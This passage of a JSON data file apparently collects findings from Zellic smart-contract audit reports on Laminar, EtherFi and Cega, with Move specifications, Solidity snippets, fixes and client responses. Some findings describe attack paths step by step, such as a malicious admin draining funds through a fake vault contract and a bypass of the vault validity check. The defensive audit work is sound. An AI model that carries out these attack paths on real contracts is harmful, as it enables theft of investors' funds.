One of the issues we encountered was that the prover does not support recursive code yet, and thus such places had to be ignored. Nevertheless, support for recursion is coming promptly, as seen in this commit. The following is a sample of the specifications provided.", + "html_url": "https://github.com/Zellic/publications/blob/master/Laminar - Zellic Audit Report.pdf" + }, + { + "title": "4.1 dex::order Verifies setter functions: spec set_size { aborts_if false; ensures order.size == size; } spec set_price { aborts_if false; ensures order.price == price;", + "labels": [ + "Zellic" + ], + "body": "4.1 dex::order Verifies setter functions: spec set_size { aborts_if false; ensures order.size == size; } spec set_price { aborts_if false; ensures order.price == price; }", + "html_url": "https://github.com/Zellic/publications/blob/master/Laminar - Zellic Audit Report.pdf" + }, + { + "title": "4.2 dex::instrument Verifies resources exist and return value upon function invocation: spec create { ensures result.price_decimals == price_decimals; ensures exists<...>(signer::address_of(account)); ensures exists<...>(signer::address_of(account));", + "labels": [ + "Zellic" + ], + "body": "4.2 dex::instrument Verifies resources exist and return value upon function invocation: spec create { ensures result.price_decimals == price_decimals; ensures exists<...>(signer::address_of(account)); ensures exists<...>(signer::address_of(account)); }", + "html_url": "https://github.com/Zellic/publications/blob/master/Laminar - Zellic Audit Report.pdf" + }, + { + "title": "4.3 dex::coin Verifies coin of type T exists after registration: spec register { ensures exists<...>(signer::address_of(account));", + "labels": [ + "Zellic" + ], + "body": "4.3 dex::coin Verifies coin of type T exists after registration: spec register { ensures exists<...>(signer::address_of(account)); }", + "html_url": "https://github.com/Zellic/publications/blob/master/Laminar - Zellic Audit Report.pdf" + }, + { + "title": "4.4 flow::guarded_idx Verifies when guards behavior: spec guard { aborts_if value == SENTINEL_VALUE; ensures result == GuardedIdx {value}; } spec unguard { aborts_if is_sentinel(guard); ensures result == guard.value; } spec try_guard { aborts_if false; ensures value != SENTINEL_VALUE ==> result == GuardedIdx {value}; } spec fun spec_none(): Option { Option{ vec: vec() } } spec fun spec_some(e: Element): Option { Option{ vec: vec(e) } } spec try_unguard { ensures guard.value == SENTINEL_VALUE ==> result == spec_none(); ensures guard.value != SENTINEL_VALUE ==> result == spec_some(guard.value);", + "labels": [ + "Zellic" + ], + "body": "4.4 flow::guarded_idx Verifies when guards behavior: spec guard { aborts_if value == SENTINEL_VALUE; ensures result == GuardedIdx {value}; } spec unguard { aborts_if is_sentinel(guard); ensures result == guard.value; } spec try_guard { aborts_if false; ensures value != SENTINEL_VALUE ==> result == GuardedIdx {value}; } spec fun spec_none(): Option { Option{ vec: vec() } } spec fun spec_some(e: Element): Option { Option{ vec: vec(e) } } spec try_unguard { ensures guard.value == SENTINEL_VALUE ==> result == spec_none(); ensures guard.value != 
SENTINEL_VALUE ==> result == spec_some(guard.value); }", + "html_url": "https://github.com/Zellic/publications/blob/master/Laminar - Zellic Audit Report.pdf" + }, + { + "title": "3.1 The claimReceiverContract variable is not fully validated", + "labels": [ + "Zellic" + ], + "body": "Target: EarlyAdopterPool Category: Coding Mistakes Likelihood: Low Severity: High Impact: Medium When the user is claiming funds through the claim() function, all of the user\u2019s deposited funds are sent to the claimReceiverContract, which is set by the owner. This is a storage variable that is set using the setClaimReceiverContract() function. Within the setClaimReceiverContract() function, the only validation done on the address of the contract is to ensure that it is not address(0). This validation is not enough, as it is possible for the owner to set the address to a contract that is not able to transfer out any ETH or ERC20 tokens that it receives. In this instance, the user\u2019s funds would be lost forever. There is a risk that user funds may become permanently locked, either by accident or as a result of deliberate actions taken by a malicious owner. See Ethereum Improvement Proposal EIP-165 for a way to determine whether a contract implements a certain interface. This will prevent the owner from making a mistake, but it will not prevent a malicious owner from locking user funds forever. Alternatively, consider not allowing this contract address to be modified by the owner. It should be made immutable. If the receiver contract\u2019s implementation needs to change in the future, consider using a proxy pattern to do that. Gadze Finance SEZC acknowledged this finding and stated that they understand the risk, but have mitigated it by ensuring that multiple parties are involved when setting the receiver contract. Their official response is produced below. The receiver contract has not been set yet and will be set through multiple parties being involved with the decision, we do understand the risk however, we have mitigated this with multiple parties being involved. We do understand it only takes 1 address to make the call and this is a risk.", + "html_url": "https://github.com/Zellic/publications/blob/master/EtherFi_-_Zellic_Audit_Report.pdf" + }, + { + "title": "3.2 Using values from emitted events may not be fully accurate", + "labels": [ + "Zellic" + ], + "body": "Target: EarlyAdopterPool Category: Coding Mistakes Likelihood: N/A Severity: Informational Impact: Informational The getContractTVL() function uses the contract\u2019s balance of ERC20 tokens and Ether to determine the TVL of the pool. function getContractTVL() public view returns (uint256 tvl) { tvl = (rETHInstance.balanceOf(address(this)) + wstETHInstance.balanceOf(address(this)) + sfrxETHInstance.balanceOf(address(this)) + cbETHInstance.balanceOf(address(this)) + address(this).balance); } This function is then used when emitting events related to TVL. The issue is that the balance of the ERC20 tokens in the contract, as well as the balance of Ether in the contract, can be manipulated by any user by sending tokens / Ether directly to the contract (as opposed to going through the deposit() function). Therefore, the TVL values returned from this function (and, by extension, emitted through events such as ERC20TVLUpdated) may be inaccurate. Without knowing how the values emitted through these events are used off chain, it is impossible to determine the impact. 
Consider tracking the balance of tokens and Ether in the contract separately through storage variables. This will prevent directly transferred tokens and Ether from being counted towards the TVL. (A sketch of this separate-accounting approach appears after finding 3.4 below.) Otherwise, ensure that the values emitted by TVL-related events are not used for critical operations off chain. Gadze Finance SEZC acknowledged this finding and stated that they want any funds sent to the contract to be included in the TVL. Their official response is produced below. We understand the issue revolving an inaccurate TVL due to the contract being able to receive funds through direct transfers, however, we would still like to include any funds sent to the contract in our total value locked.", + "html_url": "https://github.com/Zellic/publications/blob/master/EtherFi_-_Zellic_Audit_Report.pdf" + }, + { + "title": "3.3 Magic numbers should be replaced with immutable constants", + "labels": [ + "Zellic" + ], + "body": "Target: EarlyAdopterPool Category: Coding Mistakes Likelihood: N/A Severity: Informational Impact: Informational There are a number of places in the code where magic numbers are used. For brevity\u2019s sake, the following is a list of line numbers where magic numbers are being used: 187 218 225 to 228 233 to 235 The use of magic numbers makes the code confusing, both for the developers in the future and for auditors. Consider replacing magic numbers with immutable constants. In instances where the magic number is used as a flag to determine which branch a function should take, consider using either an enum or separating the logic out into multiple functions. Gadze Finance SEZC acknowledged this finding and stated that they are not worried about this issue. The finding was partially remediated by refactoring the way the magic numbers are used in commit ebd3f11a. Their official response is produced below. The magic numbers have either been marked immutable or removed and simplified. It was often the use of the numbers to simplify large numbers for the reader.", + "html_url": "https://github.com/Zellic/publications/blob/master/EtherFi_-_Zellic_Audit_Report.pdf" + }, + { + "title": "3.4 Use the correct function modifiers", + "labels": [ + "Zellic" + ], + "body": "Target: EarlyAdopterPool Category: Coding Mistakes Likelihood: N/A Severity: Informational Impact: Informational The withdraw() function is marked as payable. This is incorrect, as it does not make use of any ETH that it might (accidentally or otherwise) receive. The withdraw() and claim() functions are marked as public, although they are not used anywhere else in the contract. Functions that are marked as payable expect that ETH may be received. If the function does not account for this, then users may accidentally send ETH when invoking these functions, leading to a loss of funds. Functions that are only called externally should be marked as external. Remove the payable modifier from the withdraw() function. Replace the public modifier with the external modifier in the withdraw() and claim() functions. Gadze Finance SEZC acknowledged and partially remediated this finding by removing the payable modifier from the withdraw() function in commit b7be224c.
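As an illustration of the separate-accounting recommendation in finding 3.2 above, a minimal sketch (the depositedERC20 and depositedEther names are hypothetical, not part of the audited code):
mapping(address => uint256) public depositedERC20;
uint256 public depositedEther;
function deposit(address _erc20Contract, uint256 _amount) public {
    // ... existing whitelist and min/max deposit checks ...
    IERC20(_erc20Contract).safeTransferFrom(msg.sender, address(this), _amount);
    depositedERC20[_erc20Contract] += _amount; // only tracked deposits count toward TVL
}
function getContractTVL() public view returns (uint256 tvl) {
    tvl = depositedERC20[address(rETHInstance)]
        + depositedERC20[address(wstETHInstance)]
        + depositedERC20[address(sfrxETHInstance)]
        + depositedERC20[address(cbETHInstance)]
        + depositedEther; // tokens or Ether sent directly to the contract are ignored
}
With this accounting, a direct transfer to the pool no longer moves the reported TVL.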
", + "html_url": "https://github.com/Zellic/publications/blob/master/EtherFi_-_Zellic_Audit_Report.pdf" + }, + { + "title": "3.5 Use safe ERC20 functions", + "labels": [ + "Zellic" + ], + "body": "Target: EarlyAdopterPool Category: Coding Mistakes Likelihood: N/A Severity: Informational Impact: Informational This contract makes use of the ERC20 transfer() and transferFrom() functions. Not all ERC20 tokens adhere to the standard definition of these functions. The tokens that are used in this contract (rETH, wstETH, sfrxETH, cbETH) all adhere to the ERC20 token standard, so there is no impact. However, the cbETH token contract specifically uses a proxy pattern, which means that the contract is upgradable. If it were ever to upgrade to a new implementation where the transfer() or transferFrom() functions did not adhere to the standard anymore, then the contract would stop functioning. Consider replacing the use of transfer() and transferFrom() with the safe ERC20 safeTransfer() and safeTransferFrom() functions. Gadze Finance SEZC acknowledged this issue and contacted the Coinbase team to ensure there were no planned upgrades to the cbETH token contract that would change the transfer() and transferFrom() function definitions. The Coinbase team confirmed that this was the case. Their official response is produced below. The ERC20 tokens being used with transfers have been checked by the team and they all follow the same patterns. Due to these being the only tokens used, with no option to add others, we are happy with the implementation.", + "html_url": "https://github.com/Zellic/publications/blob/master/EtherFi_-_Zellic_Audit_Report.pdf" + }, + { + "title": "3.6 Unused variables should be removed", + "labels": [ + "Zellic" + ], + "body": "Target: EarlyAdopterPool Category: Coding Mistakes Likelihood: N/A Severity: Informational Impact: Informational The following storage variables are not used anywhere in the contract: 1. SCALE 2. multiplierCoefficient In the calculateUserPoints() function, the numberOfMultiplierMilestones variable is initialized but not used: function calculateUserPoints(address _user) public view returns (uint256) { // [ ... ] // Variable to store how many milestones (3 days) the user deposit lasted uint256 numberOfMultiplierMilestones = lengthOfDeposit / 259200; if (numberOfMultiplierMilestones > 10) { numberOfMultiplierMilestones = 10; } // [ ... ] } Unused variables introduce unnecessary complexity to the code and may lead to programmer error in the future. Remove the variables unless there are plans to use them in the future. The SCALE variable was removed in commit 8d080521. The multiplierCoefficient variable was removed in commit 1e5e61bc. The numberOfMultiplierMilestones variable was removed in commit f23285b7. 4 Threat Model This provides a full threat model description for various functions. As time permitted, we analyzed each function in the smart contracts and created a written threat model for some critical functions. A threat model documents a given function\u2019s externally controllable inputs and how an attacker could leverage each input to cause harm. Not all functions in the audit scope may have been modeled. 
The absence of a threat model in this section does not necessarily suggest that a function is safe.", + "html_url": "https://github.com/Zellic/publications/blob/master/EtherFi_-_Zellic_Audit_Report.pdf" + }, + { + "title": "4.1 Module: EarlyAdopterPool.sol Function: claim() Used to claim user funds. Branches and code coverage (including function calls) Intended branches", + "labels": [ + "Zellic" + ], + "body": "Allows user to claim rewarded funds successfully. \u2611 Test coverage Negative behavior Should fail if claiming is not open. \u2611 Negative test Should fail if the claimReceiverContract is not set. \u2611 Negative test Should fail if the claimDeadline has been reached. \u2611 Negative test Should fail if the user has not deposited anything. \u25a1 Negative test Function: depositEther() Used to deposit Ether into the contract. Branches and code coverage (including function calls) Intended branches User is able to deposit Ether successfully. \u2611 Test coverage The correct events are successfully emitted. Negative behavior Deposit should fail if claiming is open (i.e., depositing is closed). \u25a1 Negative test Function: deposit(address _erc20Contract, uint256 _amount) Used to deposit ERC20 tokens into the contract. Inputs _erc20Contract \u2013 Control: Fully controlled. \u2013 Constraints: Must be one of the whitelisted tokens (rETH, sfrxETH, wstETH, cbETH). \u2013 : This is the token that is transferred out of the user\u2019s wallet to this contract. _amount \u2013 Control: Fully controlled. \u2013 Constraints: Must be between minDeposit (0.1 Ether) and maxDeposit (100 Ether). \u2013 : This is the amount of tokens transferred out of the user\u2019s wallet to this contract. Branches and code coverage (including function calls) Intended branches User is successfully able to deposit all four tokens into the contract. \u2611 Test coverage The correct events are successfully emitted. \u2611 Test coverage Negative behavior Deposit should fail if the user provides an unsupported token contract address. \u25a1 Negative test Deposit should fail if claiming is open (i.e., depositing is closed). \u25a1 Negative test Function call analysis deposit -> _erc20Contract.transferFrom(msg.sender, address(this), _amount) \u2013 What is controllable?: _amount. \u2013 If return value controllable, how is it used and how can it go wrong?: N/A. \u2013 What happens if it reverts, reenters, or does other unusual control flow?: If it reverts, nothing happens. If it reenters, no harm can be done as the checks-effects-interactions pattern is used. Function: setClaimReceiverContract(address _receiverContract) Sets the contract that will receive claimed funds. Inputs _receiverContract \u2013 Control: Fully controlled. \u2013 Constraints: Cannot be address(0). \u2013 : User funds are transferred to this contract when funds are claimed. Branches and code coverage (including function calls) Intended branches The claim receiver contract address is set successfully. \u2611 Test coverage The required events are emitted. \u25a1 Test coverage Negative behavior Should fail if not called by the owner. \u2611 Negative test Should fail if the address of the contract is address(0). \u2611 Negative test Function: setClaimingOpen(uint256 _claimDeadline) Sets claiming to open with a specified _claimDeadline. Inputs _claimDeadline 
\u2013 : Claiming will close when this deadline is reached. Branches and code coverage (including function calls) Intended branches Should open claiming and set the deadline successfully. \u25a1 Test coverage Should emit the required events successfully. \u25a1 Test coverage Negative behavior Should fail if not called by the contract owner. 4\u25a1 Negative test Function: withdraw() Used to withdraw all funds the user may have deposited into this contract. Branches and code coverage (including function calls) Intended branches User is able to withdraw funds successfully. 4\u25a1 Test coverage Zellic Gadze Finance SEZC 5 Audit Results At the time of our audit, the code was not deployed to mainnet EVM. During our audit, we discovered six findings. Of these, one was of medium risk and five were suggestions (informational). Gadze Finance SEZC acknowledged all findings and implemented fixes for some of them.", + "html_url": "https://github.com/Zellic/publications/blob/master/EtherFi_-_Zellic_Audit_Report.pdf" + }, + { + "title": "3.1 Missing valid vault address check in processDepositQueue", + "labels": [ + "Zellic" + ], + "body": "Target: FCNProduct Category: Coding Mistakes Likelihood: Medium Severity: High : High Investors are able to deposit assets into an FCNVault through the FCNProduct contract\u2019s addToDepositQueue() function. This function pulls funds from the investor\u2019s wallet and adds Deposit objects into a global depositQueue array within the FCNProduct contract. Subsequently, a trader admin is able to call processDepositQueue() to process these Deposit objects inside the depositQueue. On a high level, the processDepositQueue() function does the following: 1. Loops over the depositQueue a maximum of maxProcessCount times, or until it is empty. 2. For each deposit, it tracks the amount being deposited in the vault\u2019s metadata storage, accessed using the passed-in vaultAddress. 3. It calls the vault\u2019s deposit() function with the deposit amount and receiver ad- dress. This will send share tokens to the receiver. 4. If the depositQueue is empty afterwards, it will delete the queue. 5. Otherwise, it will shift over all remaining deposits in the queue to the beginning of the queue. Now, there are only two checks in processDepositQueue() that are used to determine whether the vaultAddress that is passed corresponds to a valid, usable vault. They are as follows: function processDepositQueue(address vaultAddress, uint256 maxProcessCount) public onlyTraderAdmin { FCNVaultMetadata storage vaultMetadata = vaults[vaultAddress]; require(vaultMetadata.vaultStatus =) VaultStatus.DepositsOpen, \u201c500:WS\u201d); Zellic Sanic Pte. Ltd. FCNVault vault = FCNVault(vaultAddress); require(!(vaultMetadata.underlyingAmount =) 0 &) vault.totalSupply() > 0), \u201c500:Z\u201d); /) [...))] } These two checks are not enough. For example, if the trader admin deploys a mali- cious vault contract, then they can bypass both checks by doing the following: 1. Calling openVaultDeposits() with the address of their malicious vault contract. 2. Ensuring that their malicious vault contract contains a totalSupply() function that returns a value greater than zero. function openVaultDeposits(address vaultAddress) public onlyTraderAdmin { FCNVaultMetadata storage vaultMetadata = vaults[vaultAddress]; vaultMetadata.vaultStatus = VaultStatus.DepositsOpen; } After this is done, both of the checks will pass, and the code will treat the malicious vault as a valid FCNVault contract. 
A malicious trader admin can steal investors\u2019 funds using the following steps. The funds being stolen here come out of funds that are currently awaiting deposit. 1. Set up a fake malicious vault contract as described in the previous section with an empty deposit() function and a maliciously crafted redeem() function (see further below). 2. Wait for investors to add deposits into the depositQueue. 3. Call processDepositQueue() with the malicious vault address as many times as needed to process all deposits in the queue. This sets the vault\u2019s status to NotTraded. 4. Call setTradeData() with the _tradeExpiry set to a time in the past. 5. Call sendAssetsToTrade() to send the deposited assets to the market maker. This sets the vault\u2019s status to Traded. 6. Call calculateCurrentYield() with the malicious vault address. This will set the vault\u2019s status to TradeExpired. 7. Call calculateVaultFinalPayoff() with the malicious vault address. This will set the vault\u2019s status to PayoffCalculated. 8. Call collectFees() with the malicious vault address. This will set the vault\u2019s status to FeesCollected. 9. Queue a withdrawal to a trader admin\u2013controlled wallet address using the addToWithdrawalQueue() function. Any amountShares is fine here. 10. Call processWithdrawalQueue(). This function ends up calling the vault\u2019s redeem() function to determine how many assets to return to the receiver of the withdrawal. 11. Since this is the trader admin\u2019s malicious vault contract, all they need to do is ensure that the malicious redeem() function returns balanceOf(address(fcnProduct)) for themselves and 0 for all other receivers. After the final step, all asset tokens in the FCNProduct contract will be transferred out to the wallet address specified in step 9. In receiveAssetsFromCegaState(), we see the following: function receiveAssetsFromCegaState(address vaultAddress, uint256 amount) public { require(msg.sender == address(cegaState), \u201c403:CS\u201d); FCNVaultMetadata storage vaultMetadata = vaults[vaultAddress]; // a valid vaultAddress will never have vaultStart = 0 require(vaultMetadata.vaultStart != 0, \u201c400:VA\u201d); IERC20(asset).safeTransferFrom(msg.sender, address(this), amount); vaultMetadata.currentAssetAmount += amount; } This same check should be added to processDepositQueue() and all other places where a vaultAddress is passed in as an argument. This will prevent invalid vault contract addresses from being used in the contract. The client has acknowledged and remediated this issue by adding an onlyValidVault modifier that guarantees that the vaultAddress argument passed to all required functions is valid. This was done in commit f64513a9.", + "html_url": "https://github.com/Zellic/publications/blob/master/Cega - Zellic Audit Report.pdf" + }, + { + "title": "3.2 A malicious or compromised trader admin may lead to locked funds", + "labels": [ + "Zellic" + ], + "body": "Target: FCNProduct Category: Coding Mistakes Likelihood: Low Severity: Medium Impact: High Investors in the Cega protocol use the FCNProduct contract\u2019s addToDepositQueue() function to deposit their funds. This function uses safeTransferFrom() to transfer asset tokens from the investor\u2019s address to the FCNProduct contract. 
function addToDepositQueue(uint256 amount, address receiver) public { require(isDepositQueueOpen, \u201c500:NotOpen\u201d); queuedDepositsCount += 1; queuedDepositsTotalAmount += amount; require(queuedDepositsTotalAmount + sumVaultUnderlyingAmounts <= maxDepositAmountLimit, \u201c500:TooBig\u201d); IERC20(asset).safeTransferFrom(receiver, address(this), amount); depositQueue.push(Deposit({ amount: amount, receiver: receiver })); emit DepositQueued(receiver, amount); } Once these funds are deposited, the only way for the funds to leave the contract is through the following functions: 1. collectFees() - Only callable by the trader admin. Used to collect fees for the Cega protocol. 2. processWithdrawalQueue() - Only callable by the trader admin. Used to process investor withdrawals. 3. sendAssetsToTrade() - Only callable by the trader admin. Used to send deposited assets to a market maker. As there are no other ways to take deposited funds out of the contract, a malicious or compromised trader admin may choose simply to not call any of these functions. If this were to happen, any deposited investor funds (and any other funds in the contract) would become locked in the contract forever. A compromised or malicious trader admin can lead to funds being locked in the FCNProduct contract forever. Consider adding a sweep-style function that allows the protocol to transfer out any tokens in the contract to a chosen address. Ideally, this function should only be accessible by the default admin multi-sig role. function sweepTokens(address receiver) external onlyDefaultAdmin { IERC20(asset).safeTransfer(receiver, IERC20(asset).balanceOf(address(this))); } The client has acknowledged this issue, and has stated that it is mitigated due to the fact that the DefaultAdmin role can assign a new TraderAdmin through the CegaState contract.", + "html_url": "https://github.com/Zellic/publications/blob/master/Cega - Zellic Audit Report.pdf" + }, + { + "title": "3.3 The vaultAddress validity check can be bypassed", + "labels": [ + "Zellic" + ], + "body": "Target: FCNProduct Category: Coding Mistakes Likelihood: Low Severity: Medium Impact: Medium In the receiveAssetsFromCegaState() function, the following code is used to determine whether the vaultAddress passed to it corresponds to a valid vault: function receiveAssetsFromCegaState(address vaultAddress, uint256 amount) public { require(msg.sender == address(cegaState), \u201c403:CS\u201d); FCNVaultMetadata storage vaultMetadata = vaults[vaultAddress]; // a valid vaultAddress will never have vaultStart = 0 require(vaultMetadata.vaultStart != 0, \u201c400:VA\u201d); IERC20(asset).safeTransferFrom(msg.sender, address(this), amount); vaultMetadata.currentAssetAmount += amount; } This check looks correct at first glance because the only way to get a vault metadata\u2019s vaultStart property set is through the createVault() function, which always creates an instance of an FCNVault contract: function createVault( string memory _tokenName, string memory _tokenSymbol, uint256 _vaultStart ) public onlyTraderAdmin returns (address vaultAddress) { require(_vaultStart != 
0, \u201c400:VS\u201d); FCNVault vault = new FCNVault(asset, _tokenName, _tokenSymbol); address newVaultAddress = address(vault); vaultAddresses.push(newVaultAddress); // vaultMetadata & all of its fields are automatically initialized if it doesn't already exist in the mapping FCNVaultMetadata storage vaultMetadata = vaults[newVaultAddress]; vaultMetadata.vaultStart = _vaultStart; vaultMetadata.vaultAddress = newVaultAddress; emit VaultCreated(newVaultAddress, vaultAddresses.length - 1); return newVaultAddress; } However, the rolloverVault() function can allow a malicious or compromised trader admin to bypass this check. The rolloverVault() function is missing a check to ensure that the vaultAddress passed to it is valid: function rolloverVault(address vaultAddress) public onlyTraderAdmin { FCNVaultMetadata storage vaultMetadata = vaults[vaultAddress]; require(vaultMetadata.vaultStatus == VaultStatus.WithdrawalQueueProcessed, \u201c500:WS\u201d); require(vaultMetadata.tradeExpiry != 0, \u201c400:TE\u201d); vaultMetadata.vaultStart = vaultMetadata.tradeExpiry; // [ ... ] } This can be used to set an arbitrary address\u2019s vaultStart metadata property to a non-zero value, which would bypass the vaultAddress validity check. A malicious or compromised trader admin can cause the vault metadata of an arbitrary address to look like a valid FCNVault. First, a malicious vault contract must be created. It must contain the following functions: 1. A totalSupply() function that returns a value greater than zero. 2. An empty deposit() function. 3. An empty redeem() function. Then, the malicious or compromised trader admin can take the following steps to set the malicious vault contract\u2019s vaultStart metadata property to a non-zero value. 1. Call openVaultDeposits() with the malicious vault address. This will set the vault\u2019s status to DepositsOpen. 2. Call processDepositQueue() with the malicious vault address. This will set the vault\u2019s status to NotTraded. 3. Call setTradeData() with the _tradeExpiry set to a non-zero value, such that it is set to a time in the past. 4. Call sendAssetsToTrade() with the amount set to 0. This sets the vault\u2019s status to Traded. 5. Call calculateCurrentYield() with the malicious vault address. This will set the vault\u2019s status to TradeExpired. 6. Call calculateVaultFinalPayoff() with the malicious vault address. This will set the vault\u2019s status to PayoffCalculated. 7. Call collectFees() with the malicious vault address. This will set the vault\u2019s status to FeesCollected. 8. Call processWithdrawalQueue() with the malicious vault address. The withdrawal queue is empty, so this will just set the vault\u2019s status to WithdrawalQueueProcessed. 9. Call rolloverVault() with the malicious vault address. Both the require statements in the function will pass, and the vaultStart metadata property will be set to the _tradeExpiry value from step 3. Add the following check to rolloverVault(): function rolloverVault(address vaultAddress) public onlyTraderAdmin { FCNVaultMetadata storage vaultMetadata = vaults[vaultAddress]; require(vaultMetadata.vaultStart != 0); // Add this check // [ ... ] } The client has acknowledged and fixed this issue by adding a vault address validity check to rolloverVault(). This was fixed in commit f64513a9.
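In the same spirit as the onlyValidVault remediation mentioned in finding 3.1, the vaultStart-based validity check can be factored into a modifier and applied to rolloverVault() (a minimal sketch; the exact naming in the fix may differ):
modifier onlyValidVault(address vaultAddress) {
    // a valid vaultAddress will never have vaultStart == 0
    require(vaults[vaultAddress].vaultStart != 0, \u201c400:VA\u201d);
    _;
}
function rolloverVault(address vaultAddress) public onlyTraderAdmin onlyValidVault(vaultAddress) { // [ ... ] }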
", + "html_url": "https://github.com/Zellic/publications/blob/master/Cega - Zellic Audit Report.pdf" + }, + { + "title": "3.4 Ability to deposit on other users\u2019 behalf", + "labels": [ + "Zellic" + ], + "body": "Target: FCNProduct Category: Coding Mistakes Likelihood: Low Severity: Medium Impact: Medium When a user calls addToDepositQueue(), they are required to pass the address of a receiver as the second argument. The function pulls an amount of asset tokens from the receiver via the use of safeTransferFrom(): function addToDepositQueue(uint256 amount, address receiver) public { require(isDepositQueueOpen, \u201c500:NotOpen\u201d); queuedDepositsCount += 1; queuedDepositsTotalAmount += amount; require(queuedDepositsTotalAmount + sumVaultUnderlyingAmounts <= maxDepositAmountLimit, \u201c500:TooBig\u201d); IERC20(asset).safeTransferFrom(receiver, address(this), amount); depositQueue.push(Deposit({ amount: amount, receiver: receiver })); emit DepositQueued(receiver, amount); } This implies that the receiver must preapprove the FCNProduct contract, as the safeTransferFrom() will revert otherwise. Generally, the approval amount is set to the maximum uint256 value. This introduces a vector through which an attacker can deposit more assets on behalf of the receiver at a later point in time. Consider the following scenario: 1. The victim decides they want to invest 1,000 USDC into an FCN product. 2. The victim max-approves the FCNProduct contract and uses addToDepositQueue() to invest 1,000 USDC. They have no intention of investing more than this amount. 3. Some amount of time later, the attacker notices that the victim\u2019s wallet has been transferred 50,000 USDC from elsewhere. 4. The victim plans to use this USDC for other things, but the attacker now calls addToDepositQueue() with receiver set to the victim\u2019s address. 5. Since the victim has already approved the FCNProduct contract, this deposit will go through, and now the victim is at risk of losing a part of this money. The impact here is that the victim is griefed by the attacker. The attacker may or may not benefit from depositing funds on the victim\u2019s behalf, but the victim now stands to lose this money if, for example, the vault experiences a knock-in event (a downside protection for user-deposited capital). There is also no way for the victim to cancel their deposit while it is in the deposit queue. We have noted that addToWithdrawalQueue() uses a similar pattern. However, we do not believe a similar attack vector exists there. We recommend removing the use of the receiver argument and instead pulling funds directly from msg.sender. The client has acknowledged and fixed this issue by removing the receiver parameter and using msg.sender instead. This was fixed in commit 4a95e773.", + "html_url": "https://github.com/Zellic/publications/blob/master/Cega - Zellic Audit Report.pdf" + }, + { + "title": "3.5 Missing status check in openVaultDeposits", + "labels": [ + "Zellic" + ], + "body": "Target: FCNProduct Category: Coding Mistakes Likelihood: Low Severity: Low Impact: Medium Before the depositQueue can be processed for a specific vault, that vault\u2019s status needs to be set to DepositsOpen. 
This can be achieved using the openVaultDeposits() function: function openVaultDeposits(address vaultAddress) public onlyTraderAdmin { FCNVaultMetadata storage vaultMetadata = vaults[vaultAddress]; vaultMetadata.vaultStatus = VaultStatus.DepositsOpen; } This function does not check to ensure the vault is in the initial DepositsClosed status. A trader admin may accidentally, or through malicious intent, modify the status of any vault to DepositsOpen at any time from any arbitrary status. The vaults are designed to go through specific states in a certain order. If this order is not followed, the vault may end up in an unintended status, which could lead to any number of problems (e.g., the vault not functioning as intended). Add a preconditional status check to openVaultDeposits() to ensure that the vault is in a DepositsClosed status. The client has acknowledged and fixed this issue by adding a state check to openVaultDeposits(). This was fixed in commit 455ab74c.", + "html_url": "https://github.com/Zellic/publications/blob/master/Cega - Zellic Audit Report.pdf" + }, + { + "title": "3.6 Missing sanity checks for crucial protocol parameters", + "labels": [ + "Zellic" + ], + "body": "Target: FCNProduct Category: Coding Mistakes Likelihood: Low Severity: Medium Impact: Medium The Cega smart contracts rely on a number of protocol parameters to function correctly. There are functions that allow the admins of the protocol to alter most of these parameters. We found that the majority of these parameters are not checked to be within certain limits before they are set. The majority of these setter functions are only accessible by either the operator admin or the trader admin, both of which are non\u2013multi-sig wallets. In particular, the following functions are only accessible by either the operator admin or the trader admin. They are missing sanity checks on crucial protocol parameters before they are set: 1. setManagementFeeBps() - If set to 100%, it could lead to all investor funds being sent to the Cega fee recipient. Only accessible by the operator admin. 2. setYieldFeeBps() - Similar to setManagementFeeBps(). Only accessible by the operator admin. 3. setMaxDepositAmountLimit() - If set to 0, it will prevent the FCNProduct contract from accepting deposits, leading to denial of service. Only accessible by the trader admin. 4. setTradeData() - If the tradeExpiry parameter is set to hundreds of years in the future, funds would effectively be locked forever in the vault. Furthermore, the aprBps parameter can be set to a very high number. The trader admin can become an investor themselves and profit off of the high APR. Only accessible by the trader admin. 5. updateOptionBarrierOracle() and addOracle() - Allows full control over which oracle is used for a specific option barrier. Only accessible by the operator admin. 6. addOptionBarrier() and updateOptionBarrier() - If the strikeAbsoluteValue is set to 0, then a revert will occur when calculateVaultFinalPayoff() is called, as it will result in a division by 0 in calculateKnockInRatio(). Only accessible by the trader admin. (A sketch of a simple bounds check follows this list.) 
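As an illustration of the kind of sanity check recommended for the parameters above, a minimal sketch for one of the fee setters (the 10,000 basis-point cap, the error string, and the onlyOperatorAdmin modifier name are assumptions for illustration):
function setManagementFeeBps(uint256 _managementFeeBps) public onlyOperatorAdmin {
    // 10,000 bps == 100%; the fee must never consume the full deposit
    require(_managementFeeBps <= 10000, \u201c400:IB\u201d);
    managementFeeBps = _managementFeeBps;
}
Similar bounds (e.g., a maximum tradeExpiry horizon and a nonzero strikeAbsoluteValue) apply to the other setters in the list.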
Specifically, consider the setTradeData() function, which allows trader admins to mod- ify vault-specific metadata parameters. This function does not check the validity of the parameters. So, if a trader admin were to set the tradeExpiry parameter to a non- zero value that is less than the vaultStart configured in the createVault function, the collectFees() function would not be callable (i.e., the trader admin would be locked out of collecting fees). The collectFees() function internally calls the calculateFees() function, which has the following subtraction that would underflow: function calculateFees( FCNVaultMetadata storage self, uint256 managementFeeBps, uint256 yieldFeeBps ) public view returns (uint256, uint256, uint256) { /) [...))] uint256 numberOfDaysPassed = (self.tradeExpiry - self.vaultStart) / SECONDS_TO_DAYS; /) [...))] } Note that these parameters can be overridden by the default admin role (which is intended to be controlled by a multi-sig) using the setVaultMetadata() function, and therefore the impact is partially mitigated. Add sanity checks to these functions to ensure the parameters are within sane limits. The client has acknowledged and fixed this issue by adding the necessary sanity checks. This was fixed in commit a638c874. Zellic Sanic Pte. Ltd.", + "html_url": "https://github.com/Zellic/publications/blob/master/Cega - Zellic Audit Report.pdf" + }, + { + "title": "3.7 Gas griefing using zero-value deposits and withdrawals", + "labels": [ + "Zellic" + ], + "body": "Target: FCNProduct Category: Coding Mistakes Likelihood: Medium Severity: Low : Low Within the FCNProduct contract, users are able to submit deposits and withdrawals using the addToDepositQueue() and addToWithdrawalQueue() functions, respectively. Both these functions allow for zero-value deposits and withdrawals to be enqueued. The deposits and withdrawals are later processed by the processDepositQueue() and processWithdrawalQueue() functions, respectively. These functions are intended to be called by a trader admin, and they do not distinguish between zero-value and non\u2013 zero-value deposits and withdrawals. This means the same amount of gas will be used in both instances. An attacker that wants to grief the protocol into wasting gas can choose to add a lot of zero-value deposits or withdrawals. The only way to empty the queues are with the aforementioned processing functions; thus, the trader admin will be forced to waste gas on these zero-value deposits and withdrawals. Ensure that a user must deposit or withdraw a 